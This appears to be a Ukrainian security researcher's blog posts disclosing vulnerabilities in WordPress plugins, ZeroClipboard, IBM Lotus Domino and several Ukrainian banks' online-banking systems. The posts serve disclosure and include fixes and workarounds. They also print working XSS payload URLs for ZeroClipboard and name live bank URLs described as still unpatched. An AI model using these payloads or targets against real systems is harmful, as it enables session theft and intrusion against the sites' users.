Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WordPressSearch, XML Sitemap Generator та NextGEN Gallery. Для котрих з’явилися експлоіти. WordPressSearch - це плагін для пошуку нерухомості, XML Sitemap Generator - це плагін для створення xml-файлів карти сайту, NextGEN Gallery - це плагін для створення галерей зображень.

• WordPressSearch plugin SQL Injection Vulnerability (деталі)
• XML Sitemap Generator 3.2.8 Code Injection (деталі)
• WordPress NextGEN Gallery 1.9.10 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

30.06.2012

У травні, 04.05.2012, я знайшов Brute Force, Cross-Site Scripting та Cross-Site Request Forgery уразливості на http://peb.com.ua - сайті банка “Промэкономбанк” (на одному піддомені). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про energobank.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

23.02.2013

BF + XSS + CSRF:

Всі зазначені уразливості знаходиться в клієнт-банкінгу банка Промекономбанк. Всього 109 уразливостей в системи IFOBS.

https://ibank.peb.com.ua:7002

Дані уразливості досі не виправлені.

У лютому, 17.02.2013, я знайшов Cross-Site Scripting уразливості в додатках, що містять ZeroClipboard.swf.

Раніше я писав про Cross-Site Scripting уразливості в ZeroClipboard. Як я зазначав, це дуже поширена флешка, що знаходиться на десятках тисяч, а потенційно і сотень тисяч веб сайтів. І вона використовується в сотнях веб додатків. Серед них YAML, Multiproject для Trac, UserCollections для Piwigo, TAO і TableTools для DataTables для jQuery. Та існує багато інших уразливих веб додатків з ZeroClipboard.

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну (як я описав в попередньому записі).

YAML:

http://site/yaml/docs/assets/js/snippet/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Multiproject extension for Trac:

http://site/themes/default/htdocs/flash/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height 

UserCollections extension for Piwigo:

http://site/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

TAO:

http://site/filemanager/views/js/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

TableTools plugin for DataTables plugin for jQuery:

http://site/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

InfoGlue:

http://site/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

OGDI Field for Drupal:

http://site/sites/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Вразливі наступні веб додатки з флешкою: YAML 4.0.2 та попередні версії, Multiproject 1.4.21 та попередні версії, UserCollections для Piwigo, TAO 2.3.1 та попередні версії, TableTools для DataTables для jQuery. Зокрема він постачається з InfoGlue 2.1 (та попередніми версіями) та OGDI Field 6.x-1.0 (та попередніми версіями) для Drupal.

Обидві XSS уразливості в ZeroClipboard вже виправлені в останній версії (від нових розробників) ZeroClipboard 1.1.7.

В даній добірці уразливості в веб додатках:

• RSA Data Protection Manager Multiple Vulnerabilities (деталі)
• Directory Traversal - EasyITSP <= 2.0.7 (деталі)
• Weak password encryption on Huawei products (деталі)
• 0day full - Free Monthly Websites v2.0 - Multiple Web Vulnerabilities (деталі)
• radsecproxy security update (деталі)
• Privilege Gaining in DataLife Engine (деталі)
• RSA Adaptive Authentication (On-Premise) Cross-Site Scripting Vulnerabilities (деталі)
• CubeCart <= 5.2.0 (cubecart.class.php) PHP Object Injection Vulnerability (деталі)
• EMC Smarts Network Configuration Manager Multiple Vulnerabilities (деталі)
• jQuery vulnerability (деталі)

У лютому, 17.02.2013, я провів дослідження Cross-Site Scripting уразливостей в ZeroClipboard. Про що вже повідомив розробникам (старим і новим розробникам цього веб додатку).

Про ZeroClipboard я писав у вересні 2011 в статті Атаки через буфер обміну. Тоді я не проводив перевірки ZeroClipboard, лише звернув увагу на XSS через копіювання у буфер обміну та при вставці в html-форми.

На початку року hip провів перевірку ZeroClipboard. Він звернув увагу лише стосовно флешки в плагіні WP-Table Reloaded, але це не лише частина плагіна, а окремий додаток, що використовується в багатьох веб додатках і на багатьох сайтах.

Я раджу замість атакуючого коду hip використати мій варіант коду - в цьому випадку не буде зациклення алертбоксу. У версії флешки в WP-Table Reloaded XSS працює лише з параметром id (це явно модифікована версія флешки). Зате в офіційній версії ZeroClipboard без &width&height не спрацює і потрібно вказувати всі параметри.

XSS (WASC-08):

В оригінальній версії від Joseph Huckaby є дві флешки (ZeroClipboard.swf та ZeroClipboard10.swf), а нові версії від Jon Rohan і James M. Greene мають лише одну флешку (ZeroClipboard.swf).

http://site/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Також є XSS через текст, який копіюється в буфер обміну (clipText). І на тестовій сторінці (test.html), де виводиться інформація про те, який текст був скопійований, відбудеться виконання XSS коду, або при його вставці у html-форми, що вразливі до XSS через вставку (як я описав у вищезгаданій статті).

Це дуже поширена флешка (через Гугл дорки можна знайти десятки тисяч сайтів з ZeroClipboard.swf чи ZeroClipboard10.swf). Цю та інші флекши для копіювання в буфер обміну я бачив на багатьох сайтів в Інтернеті. Ось приклад на www.slideshare.net.

XSS:

• alert(document.cookie)
• цікавий

Уразливі ZeroClipboard 1.0.7 та попередні версії. XSS через параметр id і через буфер обміну були виправлені в нових версіях ZeroClipboard від нових розробників. Остання версія ZeroClipboard 1.1.7 невразлива.

22.06.2012

У травні, 04.05.2012, я знайшов Brute Force, Cross-Site Scripting та Cross-Site Request Forgery уразливості на http://energobank.com.ua - сайті банка ЕНЕРГОБАНК (на одному піддомені). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про kredobank.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

19.02.2013

BF + XSS + CSRF:

Всі зазначені уразливості знаходиться в двох клієнт-банкінгах банка КРЕДОБАНК. Всього 109 уразливостей в системи IFOBS (всі ці уразливості наявні в кожній з двох інсталяцій системи).

https://ifobs1.energobank.com.ua/ifobsClient/
https://ifobs1.energobank.com.ua/ifobsClientEnergo/

Дані уразливості досі не виправлені.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах SolveMedia, OpenInviter та Spam Free. Для котрих з’явилися експлоіти. SolveMedia - це плагін, що являє собою онлайн капча-сервіс, OpenInviter - це плагін для запрошення користувачів через контакти в адресній книзі, Spam Free - це анти-спам плагін.

• WordPress SolveMedia 1.1.0 CSRF Vulnerability (деталі)
• WordPress OpenInviter Information Disclosure (деталі)
• WordPress Spam Free 1.9.2 Filter Bypass (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

20.06.2012

У травні, 04.05.2012, я знайшов Brute Force, Cross-Site Scripting та Cross-Site Request Forgery уразливості на http://kredobank.com.ua - сайті банка КРЕДОБАНК (на одному піддомені). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про forum.ua.

Детальна інформація про уразливості з’явиться пізніше.

15.02.2013

BF + XSS + CSRF:

Всі зазначені уразливості знаходиться в клієнт-банкінгу банка КРЕДОБАНК. Всього 109 уразливостей в системи IFOBS.

https://ifobs.kredobank.com.ua/ifobsClient/

Дані уразливості досі не виправлені.

17.05.2012

У травні, 03.05.2012, під час пентесту, я виявив багато уразливостей в IBM Lotus Domino, зокрема Cross-Site Request Forgery, Cross-Site Scripting та Redirector. Це третя порція уразливостей в Lotus Domino. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в IBM Lotus Domino.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

15.02.2013

CVE: CVE-2012-4842, CVE-2012-4844.

Cross-Site Request Forgery (WASC-09):

Відсутність капчі в формі логіна (http://site/names.nsf) призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін в акаунт (щоб проводити атаки на уразливості всередині акаунта), нижченаведені XSS і Redirector атаки, Brute Force (що я описав в окремому записі) та інші автоматизовані атаки.

Cross-Site Scripting (WASC-08):

Для атаки необхідно використати робочий логін і пароль на сайті (тобто необхідно використати існуючий акаунт на сайті - це може бути власний акаунт нападника, або акаунт користувача, до якого він отримав доступ через Brute Force уразливість).

Експлоіт:

IBM Lotus Domino XSS.html

Redirector (URL Redirector Abuse) (WASC-38):

Для атаки необхідно використати робочий логін і пароль на сайті (тобто необхідно використати існуючий акаунт на сайті - це може бути власний акаунт нападника, або акаунт користувача, до якого він отримав доступ через Brute Force уразливість).

Експлоіт:

IBM Lotus Domino Redirector.html

Уразливі Lotus Domino 8.5.3 та попередні версії. Як повідомили мені з IBM наприкінці листопада, вони планують виправити уразливості (зокрема XSS і Redirector) в версії 9.0. Що повинна вийти 14.03.2013. Свій адвізорі по даним уразливостям IBM оприлюднила 30.11.2012.

До виходу нової версії всі користувачі вразливих версій IBM Lotus Domino вразливі до даних атак. При цьому представники IBM не запропонували жодних рішень цієї проблеми (Workaround чи Mitigation). Зате я запропоную обхідне рішення, яке можна використовувати до виходу версії 9.0 з виправленнями уразливостей. Воно полягає у відключенні html-форми логіна і використанні замість неї Basic Authentication.

14.06.2012

У травні, 04.05.2012, я знайшов Brute Force, Cross-Site Scripting та Cross-Site Request Forgery уразливості на http://forum.ua - сайті банка Форум (на одному піддомені). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про уразливості на alfabank.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

13.02.2013

BF + XSS + CSRF:

Всі зазначені уразливості знаходиться в клієнт-банкінгу банка Форум. Всього 109 уразливостей в системи IFOBS.

https://ifobs.forum.ua/ifobsClient/

Дані уразливості досі не виправлені.